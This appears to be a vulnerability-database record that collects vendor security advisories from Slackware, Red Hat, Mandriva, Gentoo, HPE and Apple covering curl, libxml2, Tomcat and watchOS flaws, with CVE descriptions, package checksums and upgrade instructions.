package:\n9d3d5ccbae7284c84c4667885bf9fd0d curl-7.45.0-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n7e7f04d3de8d34b8b082729ceaa53ba9 curl-7.45.0-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n00bd418a8607ea74d1986c08d5358052 curl-7.45.0-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n23e7da7ab6846fed5d18b5f5399ac400 curl-7.45.0-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n76f010b92c755f16f19840723d845e21 curl-7.45.0-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\ndaf0b67147a50e44d89f8852632fcdf7 curl-7.45.0-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n8c2a5796d4a4ce840a767423667eb97b curl-7.45.0-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n763157115101b63867217707ff4a9021 curl-7.45.0-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n0c2d192aff4af6f74281a1d724d31ce3 n/curl-7.45.0-i586-1.txz\n\nSlackware x86_64 -current package:\n4791e2bb2afd43ec0642d94e22259e81 n/curl-7.45.0-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg curl-7.45.0-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: curl security, bug fix, and enhancement update\nAdvisory ID: RHSA-2015:1254-02\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-1254.html\nIssue date: 2015-07-22\nUpdated on: 2014-12-15\nCVE Names: CVE-2014-3613 CVE-2014-3707 CVE-2014-8150 \n CVE-2015-3143 CVE-2015-3148 \n=====================================================================\n\n1. Summary:\n\nUpdated curl packages that fix multiple security issues, several bugs, and\nadd two enhancements are now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\n\n3. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nIt was found that the libcurl library did not correctly handle partial\nliteral IP addresses when parsing received HTTP cookies. An attacker able\nto trick a user into connecting to a malicious server could use this flaw\nto set the user\u0027s cookie to a crafted domain, making other cookie-related\nissues easier to exploit. (CVE-2014-3613)\n\nA flaw was found in the way the libcurl library performed the duplication\nof connection handles. If an application set the CURLOPT_COPYPOSTFIELDS\noption for a handle, using the handle\u0027s duplicate could cause the\napplication to crash or disclose a portion of its memory. (CVE-2014-3707)\n\nIt was discovered that the libcurl library failed to properly handle URLs\nwith embedded end-of-line characters. An attacker able to make an\napplication using libcurl to access a specially crafted URL via an HTTP\nproxy could use this flaw to inject additional headers to the request or\nconstruct additional requests. (CVE-2014-8150)\n\nIt was discovered that libcurl implemented aspects of the NTLM and\nNegotatiate authentication incorrectly. If an application uses libcurl\nand the affected mechanisms in a specifc way, certain requests to a\npreviously NTLM-authenticated server could appears as sent by the wrong\nauthenticated user. Additionally, the initial set of credentials for HTTP\nNegotiate-authenticated requests could be reused in subsequent requests,\nalthough a different set of credentials was specified. (CVE-2015-3143,\nCVE-2015-3148)\n\nRed Hat would like to thank the cURL project for reporting these issues. \n\nBug fixes:\n\n* An out-of-protocol fallback to SSL version 3.0 (SSLv3.0) was available\nwith libcurl. Attackers could abuse the fallback to force downgrade of the\nSSL version. The fallback has been removed from libcurl. Users requiring\nthis functionality can explicitly enable SSLv3.0 through the libcurl API. \n(BZ#1154059)\n\n* A single upload transfer through the FILE protocol opened the destination\nfile twice. If the inotify kernel subsystem monitored the file, two events\nwere produced unnecessarily. The file is now opened only once per upload. \n(BZ#883002)\n\n* Utilities using libcurl for SCP/SFTP transfers could terminate\nunexpectedly when the system was running in FIPS mode. (BZ#1008178)\n\n* Using the \"--retry\" option with the curl utility could cause curl to\nterminate unexpectedly with a segmentation fault. Now, adding \"--retry\" no\nlonger causes curl to crash. (BZ#1009455)\n\n* The \"curl --trace-time\" command did not use the correct local time when\nprinting timestamps. Now, \"curl --trace-time\" works as expected. \n(BZ#1120196)\n\n* The valgrind utility could report dynamically allocated memory leaks on\ncurl exit. Now, curl performs a global shutdown of the NetScape Portable\nRuntime (NSPR) library on exit, and valgrind no longer reports the memory\nleaks. (BZ#1146528)\n\n* Previously, libcurl returned an incorrect value of the\nCURLINFO_HEADER_SIZE field when a proxy server appended its own headers to\nthe HTTP response. Now, the returned value is valid. (BZ#1161163)\n\nEnhancements:\n\n* The \"--tlsv1.0\", \"--tlsv1.1\", and \"--tlsv1.2\" options are available for\nspecifying the minor version of the TLS protocol to be negotiated by NSS. \nThe \"--tlsv1\" option now negotiates the highest version of the TLS protocol\nsupported by both the client and the server. (BZ#1012136)\n\n* It is now possible to explicitly enable or disable the ECC and the new\nAES cipher suites to be used for TLS. (BZ#1058767, BZ#1156422)\n\nAll curl users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n835898 - Bug in DNS cache causes connections until restart of libcurl-using processes\n883002 - curl used with file:// protocol opens and closes a destination file twice\n997185 - sendrecv.c example incorrect type for sockfd\n1008178 - curl scp download fails in fips mode\n1011083 - CA certificate cannot be specified by nickname [documentation bug]\n1011101 - manpage typos found using aspell\n1058767 - curl does not support ECDSA certificates\n1104160 - Link in curl man page is wrong\n1136154 - CVE-2014-3613 curl: incorrect handling of IP addresses in cookie domain\n1154059 - curl: Disable out-of-protocol fallback to SSL 3.0\n1154747 - NTLM: ignore CURLOPT_FORBID_REUSE during NTLM HTTP auth\n1154941 - CVE-2014-3707 curl: incorrect handle duplication after COPYPOSTFIELDS\n1156422 - curl does not allow explicit control of DHE ciphers\n1161163 - Response headers added by proxy servers missing in CURLINFO_HEADER_SIZE\n1168137 - curl closes connection after HEAD request fails\n1178692 - CVE-2014-8150 curl: URL request injection vulnerability in parseurlandfillconn()\n1213306 - CVE-2015-3143 curl: re-using authenticated connection when unauthenticated\n1213351 - CVE-2015-3148 curl: Negotiate not treated as connection-oriented\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\ncurl-7.19.7-46.el6.src.rpm\n\ni386:\ncurl-7.19.7-46.el6.i686.rpm\ncurl-debuginfo-7.19.7-46.el6.i686.rpm\nlibcurl-7.19.7-46.el6.i686.rpm\n\nx86_64:\ncurl-7.19.7-46.el6.x86_64.rpm\ncurl-debuginfo-7.19.7-46.el6.i686.rpm\ncurl-debuginfo-7.19.7-46.el6.x86_64.rpm\nlibcurl-7.19.7-46.el6.i686.rpm\nlibcurl-7.19.7-46.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\ncurl-debuginfo-7.19.7-46.el6.i686.rpm\nlibcurl-devel-7.19.7-46.el6.i686.rpm\n\nx86_64:\ncurl-debuginfo-7.19.7-46.el6.i686.rpm\ncurl-debuginfo-7.19.7-46.el6.x86_64.rpm\nlibcurl-devel-7.19.7-46.el6.i686.rpm\nlibcurl-devel-7.19.7-46.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\ncurl-7.19.7-46.el6.src.rpm\n\nx86_64:\ncurl-7.19.7-46.el6.x86_64.rpm\ncurl-debuginfo-7.19.7-46.el6.i686.rpm\ncurl-debuginfo-7.19.7-46.el6.x86_64.rpm\nlibcurl-7.19.7-46.el6.i686.rpm\nlibcurl-7.19.7-46.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\ncurl-debuginfo-7.19.7-46.el6.i686.rpm\ncurl-debuginfo-7.19.7-46.el6.x86_64.rpm\nlibcurl-devel-7.19.7-46.el6.i686.rpm\nlibcurl-devel-7.19.7-46.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\ncurl-7.19.7-46.el6.src.rpm\n\ni386:\ncurl-7.19.7-46.el6.i686.rpm\ncurl-debuginfo-7.19.7-46.el6.i686.rpm\nlibcurl-7.19.7-46.el6.i686.rpm\nlibcurl-devel-7.19.7-46.el6.i686.rpm\n\nppc64:\ncurl-7.19.7-46.el6.ppc64.rpm\ncurl-debuginfo-7.19.7-46.el6.ppc.rpm\ncurl-debuginfo-7.19.7-46.el6.ppc64.rpm\nlibcurl-7.19.7-46.el6.ppc.rpm\nlibcurl-7.19.7-46.el6.ppc64.rpm\nlibcurl-devel-7.19.7-46.el6.ppc.rpm\nlibcurl-devel-7.19.7-46.el6.ppc64.rpm\n\ns390x:\ncurl-7.19.7-46.el6.s390x.rpm\ncurl-debuginfo-7.19.7-46.el6.s390.rpm\ncurl-debuginfo-7.19.7-46.el6.s390x.rpm\nlibcurl-7.19.7-46.el6.s390.rpm\nlibcurl-7.19.7-46.el6.s390x.rpm\nlibcurl-devel-7.19.7-46.el6.s390.rpm\nlibcurl-devel-7.19.7-46.el6.s390x.rpm\n\nx86_64:\ncurl-7.19.7-46.el6.x86_64.rpm\ncurl-debuginfo-7.19.7-46.el6.i686.rpm\ncurl-debuginfo-7.19.7-46.el6.x86_64.rpm\nlibcurl-7.19.7-46.el6.i686.rpm\nlibcurl-7.19.7-46.el6.x86_64.rpm\nlibcurl-devel-7.19.7-46.el6.i686.rpm\nlibcurl-devel-7.19.7-46.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\ncurl-7.19.7-46.el6.src.rpm\n\ni386:\ncurl-7.19.7-46.el6.i686.rpm\ncurl-debuginfo-7.19.7-46.el6.i686.rpm\nlibcurl-7.19.7-46.el6.i686.rpm\nlibcurl-devel-7.19.7-46.el6.i686.rpm\n\nx86_64:\ncurl-7.19.7-46.el6.x86_64.rpm\ncurl-debuginfo-7.19.7-46.el6.i686.rpm\ncurl-debuginfo-7.19.7-46.el6.x86_64.rpm\nlibcurl-7.19.7-46.el6.i686.rpm\nlibcurl-7.19.7-46.el6.x86_64.rpm\nlibcurl-devel-7.19.7-46.el6.i686.rpm\nlibcurl-devel-7.19.7-46.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3613\nhttps://access.redhat.com/security/cve/CVE-2014-3707\nhttps://access.redhat.com/security/cve/CVE-2014-8150\nhttps://access.redhat.com/security/cve/CVE-2015-3143\nhttps://access.redhat.com/security/cve/CVE-2015-3148\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFVrzSJXlSAg2UNWIIRAnEiAJ9xqOogsAzooomZ4VeMgA+gUwEuTwCfTzMn\nemWApg/iYw5vIs3rWoqmU7A=\n=p+Xb\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3143\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3148\n http://advisories.mageia.org/MGASA-2015-0179.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n fd3f4894f5c5215c29b84d70f2c6ada2 mbs1/x86_64/curl-7.24.0-3.9.mbs1.x86_64.rpm\n a00d0747b4d6ae22475948119a42efc4 mbs1/x86_64/curl-examples-7.24.0-3.9.mbs1.x86_64.rpm\n d5291ae320dd5766e4b981ff66b36e19 mbs1/x86_64/lib64curl4-7.24.0-3.9.mbs1.x86_64.rpm\n 62d5295190433ca4ff7d2cda746d6b16 mbs1/x86_64/lib64curl-devel-7.24.0-3.9.mbs1.x86_64.rpm \n 5bcf6538291f947870a9ccfe62c9ea6d mbs1/SRPMS/curl-7.24.0-3.9.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFVRx8emqjQ0CJFipgRAsfvAJ9Sn2C56m2GSJfYRC+l1x9iUmoePwCeOcgv\nC0vndeaT5lGPwsIYy65q4r4=\n=GbzX\n-----END PGP SIGNATURE-----\n",
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VAR-201512-0531
Vulnerability from variot - Updated: 2026-04-10 23:23The xmlStringLenDecodeEntities function in parser.c in libxml2 before 2.9.3 does not properly prevent entity expansion, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted XML data, a different vulnerability than CVE-2014-3660. libxml2 is prone to a denial-of-service vulnerability. Successful exploits may allow an attacker to cause an affected application to consume excessive amounts of CPU, resulting in a denial-of-service condition. libxml2 2.9.2 is vulnerable; other versions may also be affected. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. The vulnerability is caused by the program not properly restricting entity expansion. Alternatively, you may manually check for software updates by selecting "Settings -> System -> Software Update -> Update Software.".
To check the current version of software, select "Settings -> General -> About". Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.
This release of Red Hat JBoss Web Server 3.0.3 serves as a replacement for Red Hat JBoss Web Server 3.0.2, and includes bug fixes and enhancements, which are documented in the Release Notes documented linked to in the References. (CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7942, CVE-2015-8035, CVE-2015-8710, CVE-2015-7941, CVE-2015-8241, CVE-2015-8242, CVE-2015-8317)
-
A session fixation flaw was found in the way Tomcat recycled the requestedSessionSSL field. If at least one web application was configured to use the SSL session ID as the HTTP session ID, an attacker could reuse a previously used session ID for further requests. (CVE-2015-5346)
-
A CSRF flaw was found in Tomcat's the index pages for the Manager and Host Manager applications. These applications included a valid CSRF token when issuing a redirect as a result of an unauthenticated request to the root of the web application. This token could then be used by an attacker to perform a CSRF attack. (CVE-2015-5351)
-
It was found that several Tomcat session persistence mechanisms could allow a remote, authenticated user to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that placed a crafted object in a session. (CVE-2016-0714)
-
A security manager bypass flaw was found in Tomcat that could allow remote, authenticated users to access arbitrary application data, potentially resulting in a denial of service. (CVE-2016-0763)
-
A use-after-free flaw was found in the way OpenSSL imported malformed Elliptic Curve private keys. (CVE-2015-0209)
-
It was found that Tomcat could reveal the presence of a directory even when that directory was protected by a security constraint. A user could make a request to a directory via a URL not ending with a slash and, depending on whether Tomcat redirected that request, could confirm whether that directory existed. (CVE-2015-5345)
-
It was found that Tomcat allowed the StatusManagerServlet to be loaded by a web application when a security manager was configured. This allowed a web application to list all deployed web applications and expose sensitive information such as session IDs. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. JIRA issues fixed (https://issues.jboss.org/):
JWS-271 - User submitted session ID JWS-272 - User submitted session ID JWS-276 - Welcome File processing refactoring - CVE-2015-5345 low JWS-277 - Welcome File processing refactoring - CVE-2015-5345 low JWS-303 - Avoid useless session creation for manager webapps - CVE-2015-5351 moderate JWS-304 - Restrict another manager servlet - CVE-2016-0706 low JWS-349 - Session serialization safety - CVE-2016-0714 moderate JWS-350 - Protect ResourceLinkFactory.setGlobalContext() - CVE-2016-0763 moderate
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n a-c04944172
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04944172 Version: 1
HPSBGN03537 rev.1 - HPE IceWall Federation Agent and IceWall File Manager running libXML2, Remote or Local Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
- IceWall File Manager 3.0
- IceWall Federation Agent 3.0
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-5312 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2015-7497 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-7498 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-7499 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2015-7500 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-7941 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-7942 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-8241 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4 CVE-2015-8242 (AV:N/AC:M/Au:N/C:P/I:N/A:P) 5.8 CVE-2015-8317 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HPE recommends applying the latest OS vendor security patches for libXML2 to resolve the vulnerabilities in the libXML2 library.
Please note that the HP IceWall product is only available in Japan.
HISTORY Version:1 (rev.1) - 22 January 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201701-37
https://security.gentoo.org/
Severity: Normal Title: libxml2: Multiple vulnerabilities Date: January 16, 2017 Bugs: #564776, #566374, #572878, #573820, #577998, #582538, #582540, #583888, #589816, #597112, #597114, #597116 ID: 201701-37
Synopsis
Multiple vulnerabilities have been found in libxml2, the worst of which could lead to the execution of arbitrary code.
Background
libxml2 is the XML (eXtended Markup Language) C parser and toolkit initially developed for the Gnome project. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All libxml2 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.9.4-r1"
References
[ 1 ] CVE-2015-1819 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1819 [ 2 ] CVE-2015-5312 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5312 [ 3 ] CVE-2015-7497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7497 [ 4 ] CVE-2015-7498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7498 [ 5 ] CVE-2015-7499 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7499 [ 6 ] CVE-2015-7500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7500 [ 7 ] CVE-2015-7941 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7941 [ 8 ] CVE-2015-7942 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7942 [ 9 ] CVE-2015-8035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8035 [ 10 ] CVE-2015-8242 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8242 [ 11 ] CVE-2015-8806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8806 [ 12 ] CVE-2016-1836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1836 [ 13 ] CVE-2016-1838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1838 [ 14 ] CVE-2016-1839 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1839 [ 15 ] CVE-2016-1840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1840 [ 16 ] CVE-2016-2073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2073 [ 17 ] CVE-2016-3627 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3627 [ 18 ] CVE-2016-3705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3705 [ 19 ] CVE-2016-4483 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4483 [ 20 ] CVE-2016-4658 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4658 [ 21 ] CVE-2016-5131 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5131
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201701-37
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-03-21-2 watchOS 2.2
watchOS 2.2 is now available and addresses the following:
Disk Images Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of disk images. This issue was addressed through improved memory handling. CVE-ID CVE-2016-1717 : Frank Graziano of Yahoo! Pentest Team
FontParser Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)
HTTPProtocol Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659
IOHIDFamily Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1719 : Ian Beer of Google Project Zero
IOHIDFamily Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad
Kernel Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1720 : Ian Beer of Google Project Zero CVE-2016-1721 : Ian Beer of Google Project Zero and Ju Zhu of Trend Micro CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero
Kernel Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG
Kernel Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: An application may be able to bypass code signing Description: A permissions issue existed in which execute permission was incorrectly granted. This issue was addressed through improved permission validation. CVE-ID CVE-2016-1751 : Eric Monti of Square Mobile Security
Kernel Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG
libxml2 Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1761 : wol0xff working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1762
libxslt Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: A type confusion issue was addressed through improved memory handling. CVE-ID CVE-2015-7995 : puzzor
Messages Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: An attacker who is able to bypass Apple's certificate pinning, intercept TLS connections, inject messages, and record encrypted attachment-type messages may be able to read attachments Description: A cryptographic issue was addressed by rejecting duplicate messages on the client. CVE-ID CVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan of Johns Hopkins University
Security Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab
syslog Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1722 : Joshua J. Drake and Nikias Bassen of Zimperium zLabs
TrueTypeScaler Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)
WebKit Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1723 : Apple CVE-2016-1724 : Apple CVE-2016-1725 : Apple CVE-2016-1726 : Apple CVE-2016-1727 : Apple
Wi-Fi Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling.
